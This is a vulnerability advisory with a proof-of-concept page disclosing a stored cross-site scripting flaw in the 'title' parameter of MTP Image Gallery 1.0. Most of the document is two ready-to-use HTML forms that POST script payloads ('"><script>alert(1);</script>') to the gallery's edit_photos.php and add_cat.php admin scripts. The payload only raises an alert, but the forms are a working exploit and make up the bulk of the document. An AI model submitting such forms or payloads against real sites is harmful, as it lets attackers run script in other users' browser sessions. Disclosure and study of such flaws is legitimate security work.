?<!-- MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability Vendor: MTP Scripts Product web page: http://www.morephp.net Affected version: 1.0 Summary: MTP Image Gallery offers more control, better uploading and enhanced performance. With MTP Image Gallery you can easily create and maintain albums of photos via an intuitive, web interface. Desc: MTP Image Gallery suffers from a stored XSS vulnerability when parsing user input to the 'title' parameter via POST method thru 'edit_photos.php' and 'add_cat.php' scripts. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session. Tested on: Linux, Apache2 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5130 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5130.php 17.02.2013 --> <html> <head> <title>MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability</title> </head> <body><center> <form method="POST" action="http://localhost/gallery/admin/edit_photos.php?ID=39&action=edit"> <input type="hidden" name="title" value='"><script>alert(1);</script>' /> <input type="hidden" name="Filedata" value="" /> <input type="hidden" name="cats" value="12" /> <input type="hidden" name="status" value="1" /> <input type="hidden" name="full" value="1" /> <input type="hidden" name="views" value="1" /> <input type="hidden" name="rating" value="1" /> <input type="hidden" name="author" value="lqwrm" /> <input type="hidden" name="action" value="add" /> <input type="submit" value="XSS #1" /> </form> <br /><br /> <form method="POST" action="http://localhost/gallery/admin/add_cat.php"> <input type="hidden" name="action" value="add" /> <input type="hidden" name="cats" value="1" /> <input type="hidden" name="full" value="1" /> <input type="hidden" name="title" value='"><script>alert(2);</script>' /> <input type="submit" value="XSS #2" /> </form> </center></body> </html>